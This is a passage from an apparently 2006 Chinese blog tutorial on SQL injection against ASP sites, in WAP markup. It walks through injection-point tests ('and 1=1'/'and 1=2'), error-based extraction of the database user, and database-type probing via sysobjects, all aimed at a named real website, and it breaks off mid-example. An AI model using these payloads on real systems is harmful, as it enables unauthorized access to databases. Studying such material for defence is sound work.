
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
	<head><meta forua="true" http-equiv="Cache-Control" content="max-age=0" /></head><card id="MainCard" title="&#x6B22;&#x8FCE;&#x5149;&#x4E34;"><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a><br/>&nbsp;</p><p><b>&#x6807;&#x9898;&#x3A;</b> &#x53;&#x51;&#x4C;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#x5168;&#x63A5;&#x89E6;</p><p><b>&#x4F5C;&#x8005;&#x3A;</b> &#x61;&#x64;&#x6D;&#x69;&#x6E;</p><p><b>&#x65E5;&#x671F;&#x3A;</b> &#x32;&#x30;&#x30;&#x36;&#x2D;&#x30;&#x36;&#x2D;&#x32;&#x38;&#x20;&#x31;&#x31;&#x3A;&#x32;&#x38;&#x20;&#x41;&#x4D;</p><p><b>&#x5206;&#x7C7B;&#x3A;</b> <a href="wap.asp?do=showLog&amp;cateID=5">&#x57;&#x65;&#x62;&#x7F16;&#x7A0B;</a></p><p><b>&#x5185;&#x5BB9;&#x3A;</b> &#x5F15;&nbsp;&nbsp;&#x8A00;<br/>&#x968F;&#x7740;B/S&#x6A21;&#x5F0F;&#x5E94;&#x7528;&#x5F00;&#x53D1;&#x7684;&#x53D1;&#x5C55;&#xFF0C;&#x4F7F;&#x7528;&#x8FD9;&#x79CD;&#x6A21;&#x5F0F;&#x7F16;&#x5199;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x7684;&#x7A0B;&#x5E8F;&#x5458;&#x4E5F;&#x8D8A;&#x6765;&#x8D8A;&#x591A;&#x3002;&#x4F46;&#x662F;&#x7531;&#x4E8E;&#x8FD9;&#x4E2A;&#x884C;&#x4E1A;&#x7684;&#x5165;&#x95E8;&#x95E8;&#x69DB;&#x4E0D;&#x9AD8;&#xFF0C;&#x7A0B;&#x5E8F;&#x5458;&#x7684;&#x6C34;&#x5E73;&#x53CA;&#x7ECF;&#x9A8C;&#x4E5F;&#x53C2;&#x5DEE;&#x4E0D;&#x9F50;&#xFF0C;&#x76F8;&#x5F53;&#x5927;&#x4E00;&#x90E8;&#x5206;&#x7A0B;&#x5E8F;&#x5458;&#x5728;&#x7F16;&#x5199;&#x4EE3;&#x7801;&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x6CA1;&#x6709;&#x5BF9;&#x7528;&#x6237;&#x8F93;&#x5165;&#x6570;&#x636E;&#x7684;&#x5408;&#x6CD5;&#x6027;&#x8FDB;&#x884C;&#x5224;&#x65AD;&#xFF0C;&#x4F7F;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x5B58;&#x5728;&#x5B89;&#x5168;&#x9690;&#x60A3;&#x3002;&#x7528;&#x6237;&#x53EF;&#x4EE5;&#x63D0;&#x4EA4;&#x4E00;&#x6BB5;&#x6570;&#x636E;&#x5E93;&#x67E5;&#x8BE2;&#x4EE3;&#x7801;&#xFF0C;&#x6839;&#x636E;&#x7A0B;&#x5E8F;&#x8FD4;&#x56DE;&#x7684;&#x7ED3;&#x679C;&#xFF0C;&#x83B7;&#x5F97;&#x67D0;&#x4E9B;&#x4ED6;&#x60F3;&#x5F97;&#x77E5;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x8FD9;&#x5C31;&#x662F;&#x6240;&#x8C13;&#x7684;SQL Injection&#xFF0C;&#x5373;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x3002;<br/>&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x662F;&#x4ECE;&#x6B63;&#x5E38;&#x7684;WWW&#x7AEF;&#x53E3;&#x8BBF;&#x95EE;&#xFF0C;&#x800C;&#x4E14;&#x8868;&#x9762;&#x770B;&#x8D77;&#x6765;&#x8DDF;&#x4E00;&#x822C;&#x7684;Web&#x9875;&#x9762;&#x8BBF;&#x95EE;&#x6CA1;&#x4EC0;&#x4E48;&#x533A;&#x522B;&#xFF0C;&#x6240;&#x4EE5;&#x76EE;&#x524D;&#x5E02;&#x9762;&#x7684;&#x9632;&#x706B;&#x5899;&#x90FD;&#x4E0D;&#x4F1A;&#x5BF9;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x53D1;&#x51FA;&#x8B66;&#x62A5;&#xFF0C;&#x5982;&#x679C;&#x7BA1;&#x7406;&#x5458;&#x6CA1;&#x67E5;&#x770B;IIS&#x65E5;&#x5FD7;&#x7684;&#x4E60;&#x60EF;&#xFF0C;&#x53EF;&#x80FD;&#x88AB;&#x5165;&#x4FB5;&#x5F88;&#x957F;&#x65F6;&#x95F4;&#x90FD;&#x4E0D;&#x4F1A;&#x53D1;&#x89C9;&#x3002;<br/>&#x4F46;&#x662F;&#xFF0C;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x7684;&#x624B;&#x6CD5;&#x76F8;&#x5F53;&#x7075;&#x6D3B;&#xFF0C;&#x5728;&#x6CE8;&#x5165;&#x7684;&#x65F6;&#x5019;&#x4F1A;&#x78B0;&#x5230;&#x5F88;&#x591A;&#x610F;&#x5916;&#x7684;&#x60C5;&#x51B5;&#x3002;&#x80FD;&#x4E0D;&#x80FD;&#x6839;&#x636E;&#x5177;&#x4F53;&#x60C5;&#x51B5;&#x8FDB;&#x884C;&#x5206;&#x6790;&#xFF0C;&#x6784;&#x9020;&#x5DE7;&#x5999;&#x7684;SQL&#x8BED;&#x53E5;&#xFF0C;&#x4ECE;&#x800C;&#x6210;&#x529F;&#x83B7;&#x53D6;&#x60F3;&#x8981;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x662F;&#x9AD8;&#x624B;&#x4E0E;&#x201C;&#x83DC;&#x9E1F;&#x201D;&#x7684;&#x6839;&#x672C;&#x533A;&#x522B;&#x3002;<br/>&#x6839;&#x636E;&#x56FD;&#x60C5;&#xFF0C;&#x56FD;&#x5185;&#x7684;&#x7F51;&#x7AD9;&#x7528;ASP+Access&#x6216;SQLServer&#x7684;&#x5360;70%&#x4EE5;&#x4E0A;&#xFF0C;PHP+MySQ&#x5360;L20%&#xFF0C;&#x5176;&#x4ED6;&#x7684;&#x4E0D;&#x8DB3;10%&#x3002;&#x5728;&#x672C;&#x6587;&#xFF0C;&#x6211;&#x4EEC;&#x4ECE;&#x5206;&#x5165;&#x95E8;&#x3001;&#x8FDB;&#x9636;&#x81F3;&#x9AD8;&#x7EA7;&#x8BB2;&#x89E3;&#x4E00;&#x4E0B;ASP&#x6CE8;&#x5165;&#x7684;&#x65B9;&#x6CD5;&#x53CA;&#x6280;&#x5DE7;&#xFF0C;PHP&#x6CE8;&#x5165;&#x7684;&#x6587;&#x7AE0;&#x7531;NB&#x8054;&#x76DF;&#x7684;&#x53E6;&#x4E00;&#x4F4D;&#x670B;&#x53CB;zwell&#x64B0;&#x5199;&#xFF0C;&#x5E0C;&#x671B;&#x5BF9;&#x5B89;&#x5168;&#x5DE5;&#x4F5C;&#x8005;&#x548C;&#x7A0B;&#x5E8F;&#x5458;&#x90FD;&#x6709;&#x7528;&#x5904;&#x3002;&#x4E86;&#x89E3;ASP&#x6CE8;&#x5165;&#x7684;&#x670B;&#x53CB;&#x4E5F;&#x8BF7;&#x4E0D;&#x8981;&#x8DF3;&#x8FC7;&#x5165;&#x95E8;&#x7BC7;&#xFF0C;&#x56E0;&#x4E3A;&#x90E8;&#x5206;&#x4EBA;&#x5BF9;&#x6CE8;&#x5165;&#x7684;&#x57FA;&#x672C;&#x5224;&#x65AD;&#x65B9;&#x6CD5;&#x8FD8;&#x5B58;&#x5728;&#x8BEF;&#x533A;&#x3002;&#x5927;&#x5BB6;&#x51C6;&#x5907;&#x597D;&#x4E86;&#x5417;&#xFF1F;Let&#39;s Go...<br/>&#x5165; &#x95E8; &#x7BC7;<br/> &#x5982;&#x679C;&#x4F60;&#x4EE5;&#x524D;&#x6CA1;&#x8BD5;&#x8FC7;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x7684;&#x8BDD;&#xFF0C;&#x90A3;&#x4E48;&#x7B2C;&#x4E00;&#x6B65;&#x5148;&#x628A;IE&#x83DC;&#x5355;=&gt;&#x5DE5;&#x5177;=&gt;Internet&#x9009;&#x9879;=&gt;&#x9AD8;&#x7EA7;=&gt;&#x663E;&#x793A;&#x53CB;&#x597D; HTTP &#x9519;&#x8BEF;&#x4FE1;&#x606F;&#x524D;&#x9762;&#x7684;&#x52FE;&#x53BB;&#x6389;&#x3002;&#x5426;&#x5219;&#xFF0C;&#x4E0D;&#x8BBA;&#x670D;&#x52A1;&#x5668;&#x8FD4;&#x56DE;&#x4EC0;&#x4E48;&#x9519;&#x8BEF;&#xFF0C;IE&#x90FD;&#x53EA;&#x663E;&#x793A;&#x4E3A;HTTP 500&#x670D;&#x52A1;&#x5668;&#x9519;&#x8BEF;&#xFF0C;&#x4E0D;&#x80FD;&#x83B7;&#x5F97;&#x66F4;&#x591A;&#x7684;&#x63D0;&#x793A;&#x4FE1;&#x606F;&#x3002; <br/>&#x7B2C;&#x4E00;&#x8282;&#x3001;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x539F;&#x7406;<br/>&#x4EE5;&#x4E0B;&#x6211;&#x4EEC;&#x4ECE;&#x4E00;&#x4E2A;&#x7F51;&#x7AD9;www.19cn.com&#x5F00;&#x59CB;&#xFF08;&#x6CE8;&#xFF1A;&#x672C;&#x6587;&#x53D1;&#x8868;&#x524D;&#x5DF2;&#x5F81;&#x5F97;&#x8BE5;&#x7AD9;&#x7AD9;&#x957F;&#x540C;&#x610F;&#xFF0C;&#x5927;&#x90E8;&#x5206;&#x90FD;&#x662F;&#x771F;&#x5B9E;&#x6570;&#x636E;&#xFF09;&#x3002;<br/>&#x5728;&#x7F51;&#x7AD9;&#x9996;&#x9875;&#x4E0A;&#xFF0C;&#x6709;&#x540D;&#x4E3A;&#x201C;IE&#x4E0D;&#x80FD;&#x6253;&#x5F00;&#x65B0;&#x7A97;&#x53E3;&#x7684;&#x591A;&#x79CD;&#x89E3;&#x51B3;&#x65B9;&#x6CD5;&#x201D;&#x7684;&#x94FE;&#x63A5;&#xFF0C;&#x5730;&#x5740;&#x4E3A;&#xFF1A;http://www.19cn.com/showdetail.asp?id=49&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x8FD9;&#x4E2A;&#x5730;&#x5740;&#x540E;&#x9762;&#x52A0;&#x4E0A;&#x5355;&#x5F15;&#x53F7;&#x2019;&#xFF0C;&#x670D;&#x52A1;&#x5668;&#x4F1A;&#x8FD4;&#x56DE;&#x4E0B;&#x9762;&#x7684;&#x9519;&#x8BEF;&#x63D0;&#x793A;&#xFF1A;<br/>Microsoft JET Database Engine &#x9519;&#x8BEF; &#39;80040e14&#39; <br/>&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x8BED;&#x6CD5;&#x9519;&#x8BEF; &#x5728;&#x67E5;&#x8BE2;&#x8868;&#x8FBE;&#x5F0F; &#39;ID=49&#39;&#39; &#x4E2D;&#x3002;<br/>/showdetail.asp&#xFF0C;&#x884C;8<br/>&#x4ECE;&#x8FD9;&#x4E2A;&#x9519;&#x8BEF;&#x63D0;&#x793A;&#x6211;&#x4EEC;&#x80FD;&#x770B;&#x51FA;&#x4E0B;&#x9762;&#x51E0;&#x70B9;&#xFF1A;<br/>1.&#x7F51;&#x7AD9;&#x4F7F;&#x7528;&#x7684;&#x662F;Access&#x6570;&#x636E;&#x5E93;&#xFF0C;&#x901A;&#x8FC7;JET&#x5F15;&#x64CE;&#x8FDE;&#x63A5;&#x6570;&#x636E;&#x5E93;&#xFF0C;&#x800C;&#x4E0D;&#x662F;&#x901A;&#x8FC7;ODBC&#x3002;<br/>2.&#x7A0B;&#x5E8F;&#x6CA1;&#x6709;&#x5224;&#x65AD;&#x5BA2;&#x6237;&#x7AEF;&#x63D0;&#x4EA4;&#x7684;&#x6570;&#x636E;&#x662F;&#x5426;&#x7B26;&#x5408;&#x7A0B;&#x5E8F;&#x8981;&#x6C42;&#x3002;<br/>3.&#x8BE5;SQL&#x8BED;&#x53E5;&#x6240;&#x67E5;&#x8BE2;&#x7684;&#x8868;&#x4E2D;&#x6709;&#x4E00;&#x540D;&#x4E3A;ID&#x7684;&#x5B57;&#x6BB5;&#x3002;<br/>&#x4ECE;&#x4E0A;&#x9762;&#x7684;&#x4F8B;&#x5B50;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x77E5;&#x9053;&#xFF0C;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x7684;&#x539F;&#x7406;&#xFF0C;&#x5C31;&#x662F;&#x4ECE;&#x5BA2;&#x6237;&#x7AEF;&#x63D0;&#x4EA4;&#x7279;&#x6B8A;&#x7684;&#x4EE3;&#x7801;&#xFF0C;&#x4ECE;&#x800C;&#x6536;&#x96C6;&#x7A0B;&#x5E8F;&#x53CA;&#x670D;&#x52A1;&#x5668;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x4ECE;&#x800C;&#x83B7;&#x53D6;&#x4F60;&#x60F3;&#x5230;&#x5F97;&#x5230;&#x7684;&#x8D44;&#x6599;&#x3002;<br/>&#x7B2C;&#x4E8C;&#x8282;&#x3001;&#x5224;&#x65AD;&#x80FD;&#x5426;&#x8FDB;&#x884C;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;<br/>&#x770B;&#x5B8C;&#x7B2C;&#x4E00;&#x8282;&#xFF0C;&#x6709;&#x4E00;&#x4E9B;&#x4EBA;&#x4F1A;&#x89C9;&#x5F97;&#xFF1A;&#x6211;&#x4E5F;&#x662F;&#x7ECF;&#x5E38;&#x8FD9;&#x6837;&#x6D4B;&#x8BD5;&#x80FD;&#x5426;&#x6CE8;&#x5165;&#x7684;&#xFF0C;&#x8FD9;&#x4E0D;&#x662F;&#x5F88;&#x7B80;&#x5355;&#x5417;&#xFF1F;&#x5176;&#x5B9E;&#xFF0C;&#x8FD9;&#x5E76;&#x4E0D;&#x662F;&#x6700;&#x597D;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x4E3A;&#x4EC0;&#x4E48;&#x5462;&#xFF1F;<br/>&#x9996;&#x5148;&#xFF0C;&#x4E0D;&#x4E00;&#x5B9A;&#x6BCF;&#x53F0;&#x670D;&#x52A1;&#x5668;&#x7684;IIS&#x90FD;&#x8FD4;&#x56DE;&#x5177;&#x4F53;&#x9519;&#x8BEF;&#x63D0;&#x793A;&#x7ED9;&#x5BA2;&#x6237;&#x7AEF;&#xFF0C;&#x5982;&#x679C;&#x7A0B;&#x5E8F;&#x4E2D;&#x52A0;&#x4E86;cint(&#x53C2;&#x6570;)&#x4E4B;&#x7C7B;&#x8BED;&#x53E5;&#x7684;&#x8BDD;&#xFF0C;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x662F;&#x4E0D;&#x4F1A;&#x6210;&#x529F;&#x7684;&#xFF0C;&#x4F46;&#x670D;&#x52A1;&#x5668;&#x540C;&#x6837;&#x4F1A;&#x62A5;&#x9519;&#xFF0C;&#x5177;&#x4F53;&#x63D0;&#x793A;&#x4FE1;&#x606F;&#x4E3A;&#x5904;&#x7406; URL &#x65F6;&#x670D;&#x52A1;&#x5668;&#x4E0A;&#x51FA;&#x9519;&#x3002;&#x8BF7;&#x548C;&#x7CFB;&#x7EDF;&#x7BA1;&#x7406;&#x5458;&#x8054;&#x7EDC;&#x3002;<br/>&#x5176;&#x6B21;&#xFF0C;&#x90E8;&#x5206;&#x5BF9;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x6709;&#x4E00;&#x70B9;&#x4E86;&#x89E3;&#x7684;&#x7A0B;&#x5E8F;&#x5458;&#xFF0C;&#x8BA4;&#x4E3A;&#x53EA;&#x8981;&#x628A;&#x5355;&#x5F15;&#x53F7;&#x8FC7;&#x6EE4;&#x6389;&#x5C31;&#x5B89;&#x5168;&#x4E86;&#xFF0C;&#x8FD9;&#x79CD;&#x60C5;&#x51B5;&#x4E0D;&#x4E3A;&#x5C11;&#x6570;&#xFF0C;&#x5982;&#x679C;&#x4F60;&#x7528;&#x5355;&#x5F15;&#x53F7;&#x6D4B;&#x8BD5;&#xFF0C;&#x662F;&#x6D4B;&#x4E0D;&#x5230;&#x6CE8;&#x5165;&#x70B9;&#x7684;<br/>&#x90A3;&#x4E48;&#xFF0C;&#x4EC0;&#x4E48;&#x6837;&#x7684;&#x6D4B;&#x8BD5;&#x65B9;&#x6CD5;&#x624D;&#x662F;&#x6BD4;&#x8F83;&#x51C6;&#x786E;&#x5462;&#xFF1F;&#x7B54;&#x6848;&#x5982;&#x4E0B;&#xFF1A;<br/> &#x2460; http://www.19cn.com/showdetail.asp?id=49<br/>&#x2461; http://www.19cn.com/showdetail.asp?id=49 and 1=1<br/>&#x2462; http://www.19cn.com/showdetail.asp?id=49 and 1=2<br/>&#x8FD9;&#x5C31;&#x662F;&#x7ECF;&#x5178;&#x7684;1=1&#x3001;1=2&#x6D4B;&#x8BD5;&#x6CD5;&#x4E86;&#xFF0C;&#x600E;&#x4E48;&#x5224;&#x65AD;&#x5462;&#xFF1F;&#x770B;&#x770B;&#x4E0A;&#x9762;&#x4E09;&#x4E2A;&#x7F51;&#x5740;&#x8FD4;&#x56DE;&#x7684;&#x7ED3;&#x679C;&#x5C31;&#x77E5;&#x9053;&#x4E86;&#xFF1A;<br/>&#x53EF;&#x4EE5;&#x6CE8;&#x5165;&#x7684;&#x8868;&#x73B0;&#xFF1A;<br/>&#x2460; &#x6B63;&#x5E38;&#x663E;&#x793A;&#xFF08;&#x8FD9;&#x662F;&#x5FC5;&#x7136;&#x7684;&#xFF0C;&#x4E0D;&#x7136;&#x5C31;&#x662F;&#x7A0B;&#x5E8F;&#x6709;&#x9519;&#x8BEF;&#x4E86;&#xFF09;<br/>&#x2461; &#x6B63;&#x5E38;&#x663E;&#x793A;&#xFF0C;&#x5185;&#x5BB9;&#x57FA;&#x672C;&#x4E0E;&#x2460;&#x76F8;&#x540C;<br/>&#x2462; &#x63D0;&#x793A;BOF&#x6216;EOF&#xFF08;&#x7A0B;&#x5E8F;&#x6CA1;&#x505A;&#x4EFB;&#x4F55;&#x5224;&#x65AD;&#x65F6;&#xFF09;&#x3001;&#x6216;&#x63D0;&#x793A;&#x627E;&#x4E0D;&#x5230;&#x8BB0;&#x5F55;&#xFF08;&#x5224;&#x65AD;&#x4E86;rs.eof&#x65F6;&#xFF09;&#x3001;&#x6216;&#x663E;&#x793A;&#x5185;&#x5BB9;&#x4E3A;&#x7A7A;&#xFF08;&#x7A0B;&#x5E8F;&#x52A0;&#x4E86;on error resume next&#xFF09;<br/>&#x4E0D;&#x53EF;&#x4EE5;&#x6CE8;&#x5165;&#x5C31;&#x6BD4;&#x8F83;&#x5BB9;&#x6613;&#x5224;&#x65AD;&#x4E86;&#xFF0C;&#x2460;&#x540C;&#x6837;&#x6B63;&#x5E38;&#x663E;&#x793A;&#xFF0C;&#x2461;&#x548C;&#x2462;&#x4E00;&#x822C;&#x90FD;&#x4F1A;&#x6709;&#x7A0B;&#x5E8F;&#x5B9A;&#x4E49;&#x7684;&#x9519;&#x8BEF;&#x63D0;&#x793A;&#xFF0C;&#x6216;&#x63D0;&#x793A;&#x7C7B;&#x578B;&#x8F6C;&#x6362;&#x65F6;&#x51FA;&#x9519;&#x3002;<br/>&#x5F53;&#x7136;&#xFF0C;&#x8FD9;&#x53EA;&#x662F;&#x4F20;&#x5165;&#x53C2;&#x6570;&#x662F;&#x6570;&#x5B57;&#x578B;&#x7684;&#x65F6;&#x5019;&#x7528;&#x7684;&#x5224;&#x65AD;&#x65B9;&#x6CD5;&#xFF0C;&#x5B9E;&#x9645;&#x5E94;&#x7528;&#x7684;&#x65F6;&#x5019;&#x4F1A;&#x6709;&#x5B57;&#x7B26;&#x578B;&#x548C;&#x641C;&#x7D22;&#x578B;&#x53C2;&#x6570;&#xFF0C;&#x6211;&#x5C06;&#x5728;&#x4E2D;&#x7EA7;&#x7BC7;&#x7684;&#x201C;&#xFF33;&#xFF31;&#xFF2C;&#x6CE8;&#x5165;&#x4E00;&#x822C;&#x6B65;&#x9AA4;&#x201D;&#x518D;&#x505A;&#x5206;&#x6790;&#x3002; <br/>&#x7B2C;&#x4E09;&#x8282;&#x3001;&#x5224;&#x65AD;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x578B;&#x53CA;&#x6CE8;&#x5165;&#x65B9;&#x6CD5;<br/>&#x4E0D;&#x540C;&#x7684;&#x6570;&#x636E;&#x5E93;&#x7684;&#x51FD;&#x6570;&#x3001;&#x6CE8;&#x5165;&#x65B9;&#x6CD5;&#x90FD;&#x662F;&#x6709;&#x5DEE;&#x5F02;&#x7684;&#xFF0C;&#x6240;&#x4EE5;&#x5728;&#x6CE8;&#x5165;&#x4E4B;&#x524D;&#xFF0C;&#x6211;&#x4EEC;&#x8FD8;&#x8981;&#x5224;&#x65AD;&#x4E00;&#x4E0B;&#x6570;&#x636E;&#x5E93;&#x7684;&#x7C7B;&#x578B;&#x3002;&#x4E00;&#x822C;ASP&#x6700;&#x5E38;&#x642D;&#x914D;&#x7684;&#x6570;&#x636E;&#x5E93;&#x662F;Access&#x548C;SQLServer&#xFF0C;&#x7F51;&#x4E0A;&#x8D85;&#x8FC7;99%&#x7684;&#x7F51;&#x7AD9;&#x90FD;&#x662F;&#x5176;&#x4E2D;&#x4E4B;&#x4E00;&#x3002;<br/>&#x600E;&#x4E48;&#x8BA9;&#x7A0B;&#x5E8F;&#x544A;&#x8BC9;&#x4F60;&#x5B83;&#x4F7F;&#x7528;&#x7684;&#x4EC0;&#x4E48;&#x6570;&#x636E;&#x5E93;&#x5462;&#xFF1F;&#x6765;&#x770B;&#x770B;&#xFF1A;<br/>SQLServer&#x6709;&#x4E00;&#x4E9B;&#x7CFB;&#x7EDF;&#x53D8;&#x91CF;&#xFF0C;&#x5982;&#x679C;&#x670D;&#x52A1;&#x5668;IIS&#x63D0;&#x793A;&#x6CA1;&#x5173;&#x95ED;&#xFF0C;&#x5E76;&#x4E14;SQLServer&#x8FD4;&#x56DE;&#x9519;&#x8BEF;&#x63D0;&#x793A;&#x7684;&#x8BDD;&#xFF0C;&#x90A3;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x4ECE;&#x51FA;&#x9519;&#x4FE1;&#x606F;&#x83B7;&#x53D6;&#xFF0C;&#x65B9;&#x6CD5;&#x5982;&#x4E0B;&#xFF1A;<br/>http://www.19cn.com/showdetail.asp?id=49 and user&gt;0<br/>&#x8FD9;&#x53E5;&#x8BED;&#x53E5;&#x5F88;&#x7B80;&#x5355;&#xFF0C;&#x4F46;&#x5374;&#x5305;&#x542B;&#x4E86;SQLServer&#x7279;&#x6709;&#x6CE8;&#x5165;&#x65B9;&#x6CD5;&#x7684;&#x7CBE;&#x9AD3;&#xFF0C;&#x6211;&#x81EA;&#x5DF1;&#x4E5F;&#x662F;&#x5728;&#x4E00;&#x6B21;&#x65E0;&#x610F;&#x7684;&#x6D4B;&#x8BD5;&#x4E2D;&#x53D1;&#x73B0;&#x8FD9;&#x79CD;&#x6548;&#x7387;&#x6781;&#x9AD8;&#x7684;&#x731C;&#x89E3;&#x65B9;&#x6CD5;&#x3002;&#x8BA9;&#x6211;&#x770B;&#x6765;&#x770B;&#x770B;&#x5B83;&#x7684;&#x542B;&#x4E49;&#xFF1A;&#x9996;&#x5148;&#xFF0C;&#x524D;&#x9762;&#x7684;&#x8BED;&#x53E5;&#x662F;&#x6B63;&#x5E38;&#x7684;&#xFF0C;&#x91CD;&#x70B9;&#x5728;and user&gt;0&#xFF0C;&#x6211;&#x4EEC;&#x77E5;&#x9053;&#xFF0C;user&#x662F;SQLServer&#x7684;&#x4E00;&#x4E2A;&#x5185;&#x7F6E;&#x53D8;&#x91CF;&#xFF0C;&#x5B83;&#x7684;&#x503C;&#x662F;&#x5F53;&#x524D;&#x8FDE;&#x63A5;&#x7684;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x7C7B;&#x578B;&#x4E3A;nvarchar&#x3002;&#x62FF;&#x4E00;&#x4E2A;nvarchar&#x7684;&#x503C;&#x8DDF;int&#x7684;&#x6570;0&#x6BD4;&#x8F83;&#xFF0C;&#x7CFB;&#x7EDF;&#x4F1A;&#x5148;&#x8BD5;&#x56FE;&#x5C06;nvarchar&#x7684;&#x503C;&#x8F6C;&#x6210;int&#x578B;&#xFF0C;&#x5F53;&#x7136;&#xFF0C;&#x8F6C;&#x7684;&#x8FC7;&#x7A0B;&#x4E2D;&#x80AF;&#x5B9A;&#x4F1A;&#x51FA;&#x9519;&#xFF0C;SQLServer&#x7684;&#x51FA;&#x9519;&#x63D0;&#x793A;&#x662F;&#xFF1A;&#x5C06;nvarchar&#x503C; &#x201D;abc&#x201D; &#x8F6C;&#x6362;&#x6570;&#x636E;&#x7C7B;&#x578B;&#x4E3A; int &#x7684;&#x5217;&#x65F6;&#x53D1;&#x751F;&#x8BED;&#x6CD5;&#x9519;&#x8BEF;&#xFF0C;&#x5475;&#x5475;&#xFF0C;abc&#x6B63;&#x662F;&#x53D8;&#x91CF;user&#x7684;&#x503C;&#xFF0C;&#x8FD9;&#x6837;&#xFF0C;&#x4E0D;&#x5E9F;&#x5439;&#x7070;&#x4E4B;&#x529B;&#x5C31;&#x62FF;&#x5230;&#x4E86;&#x6570;&#x636E;&#x5E93;&#x7684;&#x7528;&#x6237;&#x540D;&#x3002;&#x5728;&#x4EE5;&#x540E;&#x7684;&#x7BC7;&#x5E45;&#x91CC;&#xFF0C;&#x5927;&#x5BB6;&#x4F1A;&#x770B;&#x5230;&#x5F88;&#x591A;&#x7528;&#x8FD9;&#x79CD;&#x65B9;&#x6CD5;&#x7684;&#x8BED;&#x53E5;&#x3002;<br/> &#x987A;&#x4FBF;&#x8BF4;&#x51E0;&#x53E5;&#xFF0C;&#x4F17;&#x6240;&#x5468;&#x77E5;&#xFF0C;SQLServer&#x7684;&#x7528;&#x6237;sa&#x662F;&#x4E2A;&#x7B49;&#x540C;Adminstrators&#x6743;&#x9650;&#x7684;&#x89D2;&#x8272;&#xFF0C;&#x62FF;&#x5230;&#x4E86;sa&#x6743;&#x9650;&#xFF0C;&#x51E0;&#x4E4E;&#x80AF;&#x5B9A;&#x53EF;&#x4EE5;&#x62FF;&#x5230;&#x4E3B;&#x673A;&#x7684;Administrator&#x4E86;&#x3002;&#x4E0A;&#x9762;&#x7684;&#x65B9;&#x6CD5;&#x53EF;&#x4EE5;&#x5F88;&#x65B9;&#x4FBF;&#x7684;&#x6D4B;&#x8BD5;&#x51FA;&#x662F;&#x5426;&#x662F;&#x7528;sa&#x767B;&#x5F55;&#xFF0C;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF1A;&#x5982;&#x679C;&#x662F;sa&#x767B;&#x5F55;&#xFF0C;&#x63D0;&#x793A;&#x662F;&#x5C06;&#x201D;dbo&#x201D;&#x8F6C;&#x6362;&#x6210;int&#x7684;&#x5217;&#x53D1;&#x751F;&#x9519;&#x8BEF;&#xFF0C;&#x800C;&#x4E0D;&#x662F;&#x201D;sa&#x201D;&#x3002; <br/>&#x5982;&#x679C;&#x670D;&#x52A1;&#x5668;IIS&#x4E0D;&#x5141;&#x8BB8;&#x8FD4;&#x56DE;&#x9519;&#x8BEF;&#x63D0;&#x793A;&#xFF0C;&#x90A3;&#x600E;&#x4E48;&#x5224;&#x65AD;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x578B;&#x5462;&#xFF1F;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x4ECE;Access&#x548C;SQLServer&#x548C;&#x533A;&#x522B;&#x5165;&#x624B;&#xFF0C;Access&#x548C;SQLServer&#x90FD;&#x6709;&#x81EA;&#x5DF1;&#x7684;&#x7CFB;&#x7EDF;&#x8868;&#xFF0C;&#x6BD4;&#x5982;&#x5B58;&#x653E;&#x6570;&#x636E;&#x5E93;&#x4E2D;&#x6240;&#x6709;&#x5BF9;&#x8C61;&#x7684;&#x8868;&#xFF0C;Access&#x662F;&#x5728;&#x7CFB;&#x7EDF;&#x8868;[msysobjects]&#x4E2D;&#xFF0C;&#x4F46;&#x5728;Web&#x73AF;&#x5883;&#x4E0B;&#x8BFB;&#x8BE5;&#x8868;&#x4F1A;&#x63D0;&#x793A;&#x201C;&#x6CA1;&#x6709;&#x6743;&#x9650;&#x201D;&#xFF0C;SQLServer&#x662F;&#x5728;&#x8868;[sysobjects]&#x4E2D;&#xFF0C;&#x5728;Web&#x73AF;&#x5883;&#x4E0B;&#x53EF;&#x6B63;&#x5E38;&#x8BFB;&#x53D6;&#x3002;<br/>&#x5728;&#x786E;&#x8BA4;&#x53EF;&#x4EE5;&#x6CE8;&#x5165;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x4F7F;&#x7528;&#x4E0B;&#x9762;&#x7684;&#x8BED;&#x53E5;&#xFF1A;<br/>http://www.19cn.com/showdetail.asp?id=49 and (sel&#101;ct count(*) from sysobjects)&gt;0<br/>http://www.19cn.com/showdetail.asp?id=49 and (sel&#101;ct count(*) from 